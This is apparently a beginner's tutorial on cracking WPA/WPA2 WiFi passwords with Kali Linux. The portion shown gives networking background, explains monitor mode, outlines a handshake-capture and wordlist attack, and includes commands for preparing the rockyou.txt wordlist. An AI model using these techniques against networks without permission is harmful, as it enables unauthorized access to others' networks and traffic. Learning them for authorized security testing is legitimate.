For anyone who wants to get started on an Ethical Hacking career, one of the topics you will encounter is Networking hacking.
That involves, Cracking WIFI passwords (WEP, WPA, WPA2), Deauthentication attacks (disconnecting users on a WIFI network), Man In The Middle (MITM) attacks, packet-sniffing, and packet-analysis.
This post will give you a detailed guide on cracking WPA/WPA2 WiFi passwords using Kali Linux.
Important: In this article I’ll be demonstrating how to crack a password on my WiFi network. Please do not use this method for non-ethical purposes.
Table of Contents
1.Understanding How Networks Operate
2.Managed Mode and Monitor Mode?
3.An Overview of How The Method Works
4.Important Notes
5.Step 1. Put Your Card in Monitor Mode
6.Step 2. Test Your Card For Packet Injection
7.Step 3. Packet Sniffing Using Airodump-ng
8.Step 4. Targeted Packet Sniffing
9.Step 5. Cracking WPA/WPA2 Using a Wordlist
Conclusion
Understanding How Networks Operate
Before looking at how to crack WiFi passwords, you need to understand how a network operates. A network usually contains several devices connected using a wired (Ethernet, Fiber, etc.) or wireless connection (WiFi, Bluetooth, etc.) to share resources. An excellent example of a resource that we connect to networks to access is the Internet.
Whether you are on a wired or wireless network, one device is always considered a server. For example, if you are on a home network, the server would be the router/Access point. To connect to the internet, a Device(A) will send a request to the router, which will, in turn, fetch what you want from the Internet. Data transmitted between the client and the Access Point is known as Packets.
Managed Mode and Monitor Mode?
Every device with access to the internet comes with a chip known as the Network Interface Card (NIC). This chip is responsible for capturing packets sent by the router to our device.
By default, it is set to Managed Mode. That means it can only listen to packets sent directly to our device (packets with our devices’ MAC address as the destination MAC). To crack a WPA or WPA2 WIFi, we need to capture many of these packets. Therefore, we will set our NIC to Monitor Mode. In Monitor Mode, the card will listen to all packets being sent by the router capturing as many packets as possible.
Up to this point, I believe you now have the basic knowledge required to get you started with Network hacking. Boot your Kali Linux machine, and we can begin to crack WiFi passwords.
An Overview of How The Method Works
To give you a short and simple overview so you know what’s coming up, we will:
1.Set our wireless network adapter in monitor mode so it can listen for packets
2.List all available WiFi networks
3.Target a single WiFi network from which we’ll try to capture Handshake packets – these are packets transmitted between the router and the client computer, when they’re trying to establish a connection. We want to capture these packets, because some of them will contain the hashed password.
4.We won’t be decrypting the hashed password, but it still provides a valuable clue. Next we’ll use a large list of popular passwords, and we’ll turn each one into a hashed form, and compare them with the WiFi password, in it’s hashed form, that we got from listening to packets.
5.When the hashes match, this means that we found the password.
Important Notes
In our tutorial we’ll use a popular list of passwords, called rockyou.txt, that comes with Kali Linux.
If the password you’re trying to crack isn’t in the passwords list, also called wordlist, then we won’t be able to crack it.
You can check if the password is in the wordlist by running something like sudo grep -F ‘yourpassword’ /usr/share/rockyou.txt.
Keep in mind that /usr/share/rockyou.txt is archived by default, into /usr/share/rockyou.txt.gz, so you’ll have to extract it first. To do this you can run:
cd /usr/share/wordlists && sudo gzip -d rockyou.txt.gz
how to hack wi-fi using kali linux 